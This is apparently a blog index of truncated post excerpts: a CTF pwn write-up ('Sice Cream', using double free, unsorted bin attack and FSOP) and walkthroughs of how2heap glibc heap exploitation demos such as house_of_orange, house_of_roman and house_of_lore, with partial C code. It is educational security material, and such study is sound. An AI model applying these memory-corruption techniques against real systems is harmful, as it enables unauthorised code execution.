- PWN - Sice Cream
  sice_cream (challenge link). I got about halfway through at first and ran out of ideas; after reading and understanding how2heap - house_of_orange I came back and finished this challenge. Main techniques used: DoubleFree + unsorted bin attack + FSOP. A rough overview of the program: option 1 mallocs a size you specify, and you can malloc several times; option 2 lets you selectively free memory you previously malloced. There is a global variable USER_NAME, and option 3 renames it and prints it. clot@ubuntu:~/CTF/sice_cream$ ./sice_cream Welcome to the Sice Cream Store! We have the best sice cream in the world! Whats your name? > a 1. Buy sice cream 2. Eat sice cream 3. Reintroduce yourself 4. Exit > Approach: via double...
- Heap Exploitation - how2heap - house_of_orange
  house_of_orange: unsorted bin attack + FSOP. First an unsorted bin attack is used to gain an arbitrary address write, then a forged _IO_list_all structure is used to achieve arbitrary code execution; the detailed analysis follows. (Large blocks of comments and logging have been removed from the source below.) int winner ( char *ptr); int main() { char *p1, *p2; size_t io_list_all, *top; // 1 p1 = malloc(0x400-16); top = (size_t *) ( (char *) p1 + 0x400 - 16); top[1] = 0xc01; p2 = malloc(0x1000); io_list_all = top[2] +...
- Heap Exploitation - how2heap house_of_roman
  house_of_roman: the attack method in this program can bypass ASLR even when there is nowhere to leak a libc address. The whole program is divided into 5 steps: int main(){ init(); // 1 puts("Step 1: Point fastbin chunk to __malloc_hook\n\n"); puts("Setting up chunks for relative overwrites with heap feng shui.\n"); // Use this as the UAF chunk later to edit the heap pointer later to point to the LibC value. uint8_t* fastbin_victim = malloc(0x60); //...
- Heap Exploitation - how2heap 3
  unsorted_bin_attack: this attack can be used to overwrite the value at a chosen address with a large value; it is also used to overwrite global_max_fast and then carry out a fastbin attack. int main(){ fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n"); fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the " "global variable global_max_fast in libc for further fastbin attack\n\n"); // 1 unsigned...
- Heap Exploitation - how2heap 2
  how2heap house_of_lore: this example mainly works by forging a chunk and its fd and bk pointers so that a stack address is placed into the smallbin, then using malloc and memcpy to write forged data and overwrite the return address. void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); } int main(int argc, char * argv[]){ // 1 intptr_t* stack_buffer_1[4] = {0}; intptr_t* stack_buffer_2[3] = {0}; intptr_t *victim = malloc(0x100); // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the...
- Heap Exploitation - how2heap 1
  how2heap: only the key parts of the quoted code are excerpted. first_fit: char* a = malloc(0x512); char* b = malloc(0x256); char* c; strcpy(a, "this is A!"); free(a); c = malloc(0x500); strcpy(c, "this is C!"); After a is freed it is not reset to NULL, and the memory handed out for c is the memory a originally pointed to, so the data the stale pointer a refers to is modified. This is a use-after-free (UAF) exploitation primitive. calc_tcache_idx: this mainly explains the logic of the tcache index calculation. IDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT On a 64 bit system the current values are: MINSIZE: 0x20...